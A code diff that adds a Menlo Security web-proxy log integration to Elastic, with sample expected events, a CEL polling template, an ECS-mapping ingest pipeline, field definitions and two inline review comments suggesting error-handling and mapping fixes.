@@ -0,0 +1,381 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-21T13:12:37.102Z", + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.168.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "isolate", + "category": [ + "web", + "network", + "threat" + ], + "id": "nLxXe_iU-1", + "kind": "alert", + "original": "{\"event\":{\"top_url\":\"http://elastic.co/\",\"egress_country\":\"US\",\"domain\":\"elastic.co\",\"protocol\":\"http\",\"risk_tally\":\"-1\",\"is_iframe\":\"false\",\"origin_ip\":\"192.168.1.1\",\"has_password\":\"false\",\"file_size\":\"NA\",\"browser_and_version\":\"Chrome_119\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\",\"egress_ip\":\"192.168.4.55\",\"sandboxActivity\":\"NA\",\"event_time\":\"2023-11-21T13:12:37.102000\",\"full_session_id\":\"nLxXe_iU-1\",\"dst\":\"192.168.1.1\",\"filename\":\"NA\",\"risk_score\":\"low\",\"version\":\"2.0\",\"pe_rulename\":\"Business and Economy Category\",\"soph_dlp_ref\":\"NA\",\"numSubfiles\":\"0\",\"xff_ip\":\"NA\",\"product\":\"MSIP\",\"origin_country\":\"US\",\"vendor\":\"Menlo Security\",\"rendering_mode\":\"ACR1\",\"inconsistent_domain\":\"false\",\"x-client-country\":\"US\",\"sandboxResult\":\"NA\",\"request_type\":\"GET\",\"fullScanResult\":\"NA\",\"tab_id\":\"1\",\"pe_reason\":\"a77757d5-d3be-47ab-9394-cfff5887ade4\",\"categories\":\"Business and Economy\",\"severity\":\"5\",\"x-client-ip\":\"192.168.4.3\",\"name\":\"page_request\",\"url\":\"http://elastic.co/\",\"region\":\"us-east-1c\",\"userid\":\"example_user\",\"magicName\":\"NA\",\"pe_action\":\"isolate\",\"ua_type\":\"supported_browser\",\"content-type\":\"text/html; charset=UTF-8\",\"response_code\":\"308\"}}", + "outcome": 
"failure", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "severity": 5 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 308 + } + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=UTF-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "http" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.168.4.55" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.168.4.3", + "192.168.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "elastic.co", + "original": "http://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "http", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } + }, + { + "@timestamp": "2023-11-21T13:12:37.132Z", + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.168.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "isolate", + "category": [ + "web", + "network", + "threat" + 
], + "id": "nLxXe_iU-1", + "kind": "alert", + "original": "{\"event\":{\"top_url\":\"https://elastic.co/\",\"egress_country\":\"US\",\"domain\":\"elastic.co\",\"protocol\":\"https\",\"risk_tally\":\"-1\",\"is_iframe\":\"false\",\"origin_ip\":\"192.168.1.1\",\"has_password\":\"false\",\"file_size\":\"NA\",\"browser_and_version\":\"Chrome_119\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\",\"egress_ip\":\"192.168.4.55\",\"sandboxActivity\":\"NA\",\"event_time\":\"2023-11-21T13:12:37.132000\",\"full_session_id\":\"nLxXe_iU-1\",\"dst\":\"192.168.1.1\",\"filename\":\"NA\",\"risk_score\":\"low\",\"version\":\"2.0\",\"pe_rulename\":\"Business and Economy Category\",\"soph_dlp_ref\":\"NA\",\"numSubfiles\":\"0\",\"xff_ip\":\"NA\",\"product\":\"MSIP\",\"origin_country\":\"US\",\"vendor\":\"Menlo Security\",\"rendering_mode\":\"ACR1\",\"inconsistent_domain\":\"false\",\"x-client-country\":\"US\",\"sandboxResult\":\"NA\",\"request_type\":\"GET\",\"referer\":\"http://elastic.co/\",\"fullScanResult\":\"NA\",\"tab_id\":\"1\",\"pe_reason\":\"a77757d5-d3be-47ab-9394-cfff5887ade4\",\"categories\":\"Business and Economy\",\"severity\":\"5\",\"x-client-ip\":\"192.168.4.3\",\"name\":\"page_request\",\"url\":\"https://elastic.co/\",\"region\":\"us-east-1c\",\"userid\":\"example_user\",\"magicName\":\"NA\",\"pe_action\":\"isolate\",\"ua_type\":\"supported_browser\",\"response_code\":\"301\"}}", + "outcome": "failure", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "severity": 5 + }, + "http": { + "request": { + "method": "GET", + "referrer": "http://elastic.co/" + }, + "response": { + "status_code": 301 + } + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "https" + 
}, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.168.4.55" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.168.4.3", + "192.168.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "elastic.co", + "original": "https://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "https", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } + }, + { + "@timestamp": "2023-11-21T13:12:37.207Z", + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.2" + }, + "dns": { + "answers": { + "data": [ + "192.168.1.2" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "isolate", + "category": [ + "web", + "network", + "threat" + ], + "id": "nLxXe_iU-1", + "kind": "alert", + "original": "{\"event\":{\"top_url\":\"https://www.elastic.co/\",\"egress_country\":\"US\",\"domain\":\"www.elastic.co\",\"protocol\":\"https\",\"risk_tally\":\"-1\",\"is_iframe\":\"false\",\"origin_ip\":\"192.168.1.2\",\"has_password\":\"false\",\"file_size\":\"NA\",\"browser_and_version\":\"Chrome_119\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 
Safari/537.36\",\"egress_ip\":\"192.168.4.55\",\"sandboxActivity\":\"NA\",\"event_time\":\"2023-11-21T13:12:37.207000\",\"full_session_id\":\"nLxXe_iU-1\",\"dst\":\"192.168.1.2\",\"filename\":\"NA\",\"risk_score\":\"low\",\"version\":\"2.0\",\"pe_rulename\":\"Business and Economy Category\",\"soph_dlp_ref\":\"NA\",\"numSubfiles\":\"0\",\"xff_ip\":\"NA\",\"product\":\"MSIP\",\"origin_country\":\"US\",\"vendor\":\"Menlo Security\",\"rendering_mode\":\"ACR1\",\"inconsistent_domain\":\"false\",\"x-client-country\":\"US\",\"sandboxResult\":\"NA\",\"request_type\":\"GET\",\"referer\":\"http://elastic.co/\",\"fullScanResult\":\"NA\",\"tab_id\":\"1\",\"pe_reason\":\"a77757d5-d3be-47ab-9394-cfff5887ade4\",\"categories\":\"Business and Economy\",\"severity\":\"5\",\"x-client-ip\":\"192.168.4.3\",\"name\":\"page_request\",\"url\":\"https://www.elastic.co/\",\"region\":\"us-east-1c\",\"userid\":\"example_user\",\"magicName\":\"NA\",\"pe_action\":\"isolate\",\"ua_type\":\"supported_browser\",\"content-type\":\"text/html; charset=utf-8\",\"response_code\":\"200\"}}", + "outcome": "failure", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "severity": 5 + }, + "http": { + "request": { + "method": "GET", + "referrer": "http://elastic.co/" + }, + "response": { + "status_code": 200 + } + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=utf-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "https" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.168.4.55" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.168.4.3", + "192.168.1.2" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.2" + }, + "source": { + 
"geo": {
+ "country_iso_code": "US"
+ },
+ "ip": "192.168.4.3"
+ },
+ "tags": [
+ "preserve_original_event"
+ ],
+ "url": {
+ "domain": "www.elastic.co",
+ "original": "https://www.elastic.co/",
+ "path": "/",
+ "registered_domain": "elastic.co",
+ "scheme": "https",
+ "subdomain": "www",
+ "top_level_domain": "co"
+ },
+ "user": {
+ "name": "example_user"
+ },
+ "user_agent": {
+ "device": {
+ "name": "Mac"
+ },
+ "name": "Chrome",
+ "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
+ "os": {
+ "full": "Mac OS X 10.15.7",
+ "name": "Mac OS X",
+ "version": "10.15.7"
+ },
+ "version": "119.0.0.0"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/packages/menlo/data_stream/web/_dev/test/system/test-default-config.yml b/packages/menlo/data_stream/web/_dev/test/system/test-default-config.yml
new file mode 100644
index 00000000000..cf8c52ab8b8
--- /dev/null
+++ b/packages/menlo/data_stream/web/_dev/test/system/test-default-config.yml
@@ -0,0 +1,11 @@
+input: cel
+service: menlo
+vars:
+ url: http://{{Hostname}}:{{Port}}/api/rep/v1/fetch/client_select
+ token: xxxx
+data_stream:
+ vars:
+ batch_size: 2
+ preserve_original_event: true
+assert:
+ hit_count: 4
diff --git a/packages/menlo/data_stream/web/agent/stream/input.yml.hbs b/packages/menlo/data_stream/web/agent/stream/input.yml.hbs
new file mode 100644
index 00000000000..632af803549
--- /dev/null
+++ b/packages/menlo/data_stream/web/agent/stream/input.yml.hbs
@@ -0,0 +1,80 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +redact: + fields: + - token +resource.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +state: + batch_size: {{batch_size}} + initial_interval: {{initial_interval}} + token: {{token}} +program: | + post_request( + state.url + "?format=json" + "&limit=" + string(state.batch_size) + "&end=" + string(int(now())) + "&start=" + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(int(state.cursor.last_timestamp.parse_time(time_layout.RFC3339))) + : + (string(int(now() - duration(state.initial_interval)))) + ), + "application/json", + {"token": state.token, "log_type": "web", "pagingIdentifiers": ( + has(state.cursor) && has(state.cursor.paging) && state.cursor.paging != null ? + state.cursor.paging + : + {} + ) + }.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body[0].result.events.map(e, { + "message": e.encode_json(), + }), + "url": state.url, + "batch_size": state.batch_size, + "token": state.token, + "cursor": { + "last_timestamp": ( + has(body[0].timestamp) && body[0].timestamp.size() > 0 + ? + body[0].timestamp.parse_time(time_layout.RFC3339) + : + null + ), + "paging": ( + has(body[0].result.pagingIdentifiers) && body[0].result.pagingIdentifiers.size() > 0 ? 
+ body[0].result.pagingIdentifiers + : + null + ) + } + }) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/menlo/data_stream/web/elasticsearch/ingest_pipeline/default.yml b/packages/menlo/data_stream/web/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..6da7be87255 --- /dev/null +++ b/packages/menlo/data_stream/web/elasticsearch/ingest_pipeline/default.yml 
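Review bot: In the `.do_request().as(resp, …)` expression the CEL program feeds `resp.Body` straight into `decode_json()` and then indexes `body[0].result.events` without ever checking `resp.StatusCode`, so an expired token (401/403), a 429, or an HTML error page from the API surfaces only as an opaque CEL evaluation error and no `error` event reaches the pipeline or the operator. Guard on the status code and emit the failure as an event, as sketched below, so collection stops visibly rather than silently. It may also be worth confirming that a non-null `pagingIdentifiers` is intended to wait for the next `interval` tick instead of being drained in the same run, since the result sets no `want_more`.
```yaml
  ).do_request().as(resp, (resp.StatusCode == 200) ?
    bytes(resp.Body).decode_json().as(body, {
      // … unchanged: events, url, batch_size, token and cursor construction …
    })
  :
    {
      "events": {
        "error": {
          "code": string(resp.StatusCode),
          "id": string(resp.Status),
          "message": "POST " + state.url + ": " + (
            size(resp.Body) != 0 ?
              string(resp.Body)
            :
              string(resp.Status) + " (" + string(resp.StatusCode) + ")"
          ),
        },
      },
      "want_more": false,
    }
  )
```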
@@ -0,0 +1,346 @@ +--- +description: Mapping of Menlo Web Proxy Fields from API into ECS fields. +processors: + - set: + field: ecs.version + value: 8.11.0 + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + if: ctx.event?.original == null + ignore_missing: true + - set: + field: event.kind + value: alert + - json: + field: event.original + tag: 'json_decoding' + target_field: json + - date: + field: json.event.event_time + formats: + - ISO8601 + target_field: '@timestamp' + timezone: UTC + tag: date_timestamp_epoch + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.event.severity + type: long + target_field: event.severity + ignore_missing: true + - rename: + field: json.event.full_session_id + target_field: event.id + ignore_missing: true + - rename: + field: json.event.pe_action + target_field: event.action + ignore_missing: true + - set: + field: event.outcome + value: unknown + - set: + field: event.outcome + value: failure + if: ctx.event.action == 'block' || ctx.event.action == 'isolate' || ctx.event.action == 'ssl_exception' + - set: + field: event.outcome + value: success + if: ctx.event.action == 'direct' || ctx.event.action == 'allow' + - rename: + field: json.event.pe_reason + target_field: event.reason + ignore_missing: true + - set: + field: event.category + value: web + - append: + field: event.category + value: network + - append: + field: event.category + value: threat + - rename: + field: json.event.name + target_field: menlo.web.request_type + ignore_missing: true + - rename: + field: json.event.soph_dlp_ref + target_field: event.reference + if: ctx.json?.event?.soph_dlp_ref != "NA" + ignore_missing: true + - rename: + field: json.event.risk_score + target_field: 
menlo.web.risk_score + ignore_missing: true + - append: + field: dns.answers.data + value: '{{{json.event.dst}}}' + allow_duplicates: false + - rename: + field: json.event.product + target_field: observer.product + ignore_missing: true + - rename: + field: json.event.vendor + target_field: observer.vendor + ignore_missing: true + - convert: + field: json.event.risk_tally + type: long + target_field: menlo.web.tally + ignore_missing: true + - convert: + field: json.event.has_password + type: boolean + target_field: menlo.web.has_password + if: ctx?.json?.event?.has_password != "NA" + ignore_missing: true + - convert: + field: json.event.x-client-ip + type: ip + target_field: client.ip + ignore_missing: true + ignore_failure: true + - convert: + field: json.event.origin_ip + type: ip + target_field: server.ip + ignore_failure: true + - rename: + field: json.event.origin_country + target_field: server.geo.country_iso_code + ignore_failure: true + - rename: + field: json.event.x-client-country + target_field: client.geo.country_iso_code + ignore_failure: true + - rename: + field: json.event.egress_country + target_field: observer.geo.country_iso_code + ignore_missing: true + ignore_failure: true + - convert: + field: json.event.file_size + type: long + target_field: file.size + if: ctx.json?.event?.file_size != "NA" + ignore_missing: true + - append: + field: observer.ip + value: '{{{json.event.egress_ip}}}' + allow_duplicates: false + if: ctx.json?.event?.egress_ip != "NA" + - set: + field: destination + copy_from: server + ignore_empty_value: true + - set: + field: source + copy_from: client + - rename: + field: json.event.content-type + target_field: menlo.web.content_type + ignore_missing: true + - user_agent: + field: json.event.user-agent + ignore_missing: true + - rename: + field: json.event.request_type + target_field: http.request.method + ignore_missing: true + - rename: + field: json.event.ua_type + target_field: menlo.web.ua_type + ignore_missing: true + - 
rename: + field: json.event.version + target_field: observer.version + ignore_missing: true + - uri_parts: + field: json.event.url + keep_original: true + remove_if_successful: true + ignore_failure: true + - registered_domain: + field: url.domain + target_field: url + - rename: + field: json.event.referer + target_field: http.request.referrer + ignore_missing: true + - rename: + field: json.event.userid + target_field: user.name + ignore_missing: true + - append: + field: related.user + value: "{{{user.name}}}" + allow_duplicates: false + if: ctx.user?.name != null + - rename: + field: json.event.protocol + target_field: network.protocol + ignore_missing: true + - convert: + field: json.event.response_code + type: long + target_field: http.response.status_code + ignore_missing: true + - set: + copy_from: json.event.region + tag: set_cloud_region + field: cloud.region + ignore_empty_value: true + - rename: + field: json.event.filename + target_field: file.name + ignore_missing: true + if: ctx.json?.event?.filename != "NA" + - rename: + field: json.event.sha256 + target_field: file.hash.sha256 + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.sha256}}" + allow_duplicates: false + if: ctx.file?.hash?.sha256 != null + - rename: + field: json.event.categories + target_field: menlo.web.categories + - rename: + field: json.event.threats + target_field: menlo.web.threats + ignore_missing: true + - rename: + field: json.event.threat_types + target_field: menlo.web.threat_types + ignore_missing: true + - rename: + field: json.event.is_iframe + target_field: menlo.web.is_iframe + ignore_missing: true + - rename: + field: json.event.product + target_field: observer.product + ignore_missing: true + - rename: + field: json.event.protocol + target_field: network.protocol + ignore_missing: true + - rename: + field: json.event.cached + target_field: menlo.web.cached + ignore_missing: true + - rename: + field: json.event.casb_app_name + target_field: 
menlo.web.casb_app_name + ignore_missing: true + - rename: + field: json.event.casb_cat_name + target_field: menlo.web.casb_cat_name + ignore_missing: true + - rename: + field: json.event.casb_fun_name + target_field: menlo.web.casb_fun_name + ignore_missing: true + - rename: + field: json.event.casb_org_name + target_field: menlo.web.casb_org_name + ignore_missing: true + - rename: + field: json.event.casb_profile_id + target_field: menlo.web.casb_profile_id + ignore_missing: true + - rename: + field: json.event.casb_profile_name + target_field: menlo.web.casb_profile_name + ignore_missing: true + - rename: + field: json.event.casb_profile_type + target_field: menlo.web.casb_profile_type + ignore_missing: true + - rename: + field: json.event.casb_risk_score + target_field: menlo.web.casb_risk_score + ignore_missing: true + - rename: + field: json.event.sbox + target_field: menlo.web.sbox + ignore_missing: true + - rename: + field: json.event.sbox_mal_act + target_field: menlo.web.sbox_mal_act + ignore_missing: true + - rename: + field: json.event.soph + target_field: menlo.web.soph + ignore_missing: true + - rename: + field: json.event.tab_id + target_field: menlo.web.tab_id + ignore_missing: true + - rename: + field: json.event.virus_details + target_field: menlo.web.virus_details + ignore_missing: true + - rename: + field: json.event.xff_ip + target_field: menlo.web.xff_ip + ignore_missing: true + if: ctx?.json?.event?.xff_ip != "NA" + - append: + field: related.ip + value: '{{source.ip}}' + if: ctx.source?.ip != null + allow_duplicates: false + - append: + field: related.ip + value: '{{destination.ip}}' + if: ctx.destination?.ip != null + allow_duplicates: false + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + 
description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/menlo/data_stream/web/fields/agent.yml b/packages/menlo/data_stream/web/fields/agent.yml new file mode 100644 index 00000000000..98d2f9f38d5 --- /dev/null +++ b/packages/menlo/data_stream/web/fields/agent.yml 
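Review bot: `registered_domain` on `url.domain` and the `rename` of `json.event.categories` to `menlo.web.categories` have no `ignore_missing`, so a record without a `url` (or one that `uri_parts` could not parse, which is otherwise tolerated via `ignore_failure: true`) or without `categories` aborts the whole pipeline into the `on_failure` handler and loses every other field; add `ignore_missing: true` to both processors. The `dns.answers.data` append of `{{{json.event.dst}}}` is also unguarded, unlike the `observer.ip` append that checks `!= "NA"`, so the vendor's `NA` placeholder would be indexed as an answer if `dst` ever carries it. Separately, `event.kind` is hard-set to `alert` and `event.category` always receives `threat`, even for `allow`/`direct` actions that this same pipeline maps to `event.outcome: success`; since that turns every page request into an alert, consider `kind: event` as the default and `alert` only for actions the product treats as a verdict (as far as I can tell, `isolate` is Menlo's normal rendering mode rather than a detection). Minor: `is_iframe` is carried through as a string while `has_password` is converted to boolean, and the `related.hash` append uses `{{file.hash.sha256}}` where the rest of the file uses triple braces.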
@@ -0,0 +1,177 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`.' + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. 
It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/menlo/data_stream/web/fields/base-fields.yml b/packages/menlo/data_stream/web/fields/base-fields.yml new file mode 100644 index 00000000000..db401bc6d0f --- /dev/null +++ b/packages/menlo/data_stream/web/fields/base-fields.yml 
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: menlo
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset.
+ value: menlo.web
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/menlo/data_stream/web/fields/ecs.yml b/packages/menlo/data_stream/web/fields/ecs.yml
new file mode 100644
index 00000000000..675463fef80
--- /dev/null
+++ b/packages/menlo/data_stream/web/fields/ecs.yml
@@ -0,0 +1,104 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.created
+- external: ecs
+ name: event.type
+- external: ecs
+ name: destination.domain
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.id
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.outcome
+- external: ecs
+ name: event.reason
+- external: ecs
+ name: event.severity
+- external: ecs
+ name: dns.answers.data
+- external: ecs
+ name: destination.geo.country_iso_code
+- external: ecs
+ name: destination.ip
+- external: ecs
+ name: client.geo.country_iso_code
+- external: ecs
+ name: client.ip
+- external: ecs
+ name: network.protocol
+- external: ecs
+ name: observer.geo.country_iso_code
+- external: ecs
+ name: observer.ip
+- external: ecs
+ name: observer.product
+- external: ecs
+ name: observer.vendor
+- external: ecs
+ name: observer.version
+- external: ecs
+ name: related.ip
+- external: ecs
+ name: related.user
+- external: ecs
+ name: related.hash
+- external: ecs
+ name: file.name
+- external: ecs
+ name: http.request.method
+- external: ecs
+ name: http.request.mime_type
+- external: ecs
+ name: http.request.referrer
+- external: ecs
+ name: http.response.status_code
+- external: ecs
+ name: message
+- external: ecs
+ name: source.geo.country_iso_code
+- external: ecs
+ name: source.ip
+- external: ecs
+ name: server.geo.country_iso_code
+- external: ecs
+ name: server.ip
+- external: ecs
+ name: tags
+- external: ecs
+ name: url.domain
+- external: ecs
+ name: url.registered_domain
+- external: ecs
+ name: url.top_level_domain
+- external: ecs
+ name: url.original
+- external: ecs
+ name: url.path
+- external: ecs
+ name: url.scheme
+- external: ecs
+ name: url.subdomain
+- external: ecs
+ name: user.name
+- external: ecs
+ name: user_agent.device.name
+- external: ecs
+ name: user_agent.name
+- external: ecs
+ name: user_agent.original
+- external: ecs
+ name: user_agent.os.full
+- external: ecs
+ name: user_agent.os.name
+- external: ecs
+ name: user_agent.os.version
